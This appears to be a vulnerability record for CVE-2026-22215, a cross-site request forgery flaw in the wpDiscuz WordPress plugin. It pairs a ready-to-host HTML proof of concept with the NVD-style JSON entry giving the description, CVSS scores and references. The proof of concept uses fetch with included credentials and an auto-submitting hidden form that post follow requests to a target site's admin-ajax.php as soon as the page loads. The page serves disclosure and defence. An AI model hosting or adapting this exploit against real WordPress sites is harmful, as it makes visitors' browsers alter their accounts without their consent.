CVE-2026-22215

<!-- CSRF PoC for CVE-2026-22215 - wpDiscuz getFollowsPage CSRF --> <html> <head> <title>CVE-2026-22215 CSRF PoC</title> </head> <body> <h1>CVE-2026-22215 - wpDiscuz CSRF PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in wpDiscuz getFollowsPage()</p> <script> // Enumerate follows relationships function exploitEnumFollows() { fetch('https://target-site.com/wp-admin/admin-ajax.php', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=wpdiscuz_follow_page&do=follow&userId=1' }) .then(response => response.json()) .then(data => console.log('Follow response:', data)) .catch(error => console.error('Error:', error)); } // Execute on page load window.onload = function() { console.log('CSRF PoC executing...'); exploitEnumFollows(); }; </script> <!-- Auto-submit form for manipulating follows --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpdiscuz_follow_page"> <input type="hidden" name="do" value="follow"> <input type="hidden" name="userId" value="TARGET_USER_ID"> </form> <script> // Auto-submit for follow manipulation document.getElementById('csrfForm').submit(); </script> </body> </html>

{"cve": {"id": "CVE-2026-22215", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:11.440", "lastModified": "2026-03-17T11:44:28.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wpDiscuz before 7.6.47 contains a cross-site request forgery vulnerability in the getFollowsPage() function that allows attackers to trigger unauthorized actions without nonce validation. Attackers can craft malicious requests to enumerate follow relationships and manipulate user follow data by exploiting the missing CSRF protection in the follows page handler."}, {"lang": "es", "value": "wpDiscuz anterior a la versión 7.6.47 contiene una vulnerabilidad de falsificación de petición en sitios cruzados en la función getFollowsPage() que permite a los atacantes desencadenar acciones no autorizadas sin validación de nonce. Los atacantes pueden elaborar peticiones maliciosas para enumerar relaciones de seguimiento y manipular datos de seguimiento de usuarios explotando la protección CSRF ausente en el gestor de la página de seguimiento."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://wordpress.org/plugins/wpdiscuz/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wordpress.org/plugins/wpdiscuz/#developers", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/wpdiscuz-before-missing-csrf-protection-on-wpdgetfollowspage", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}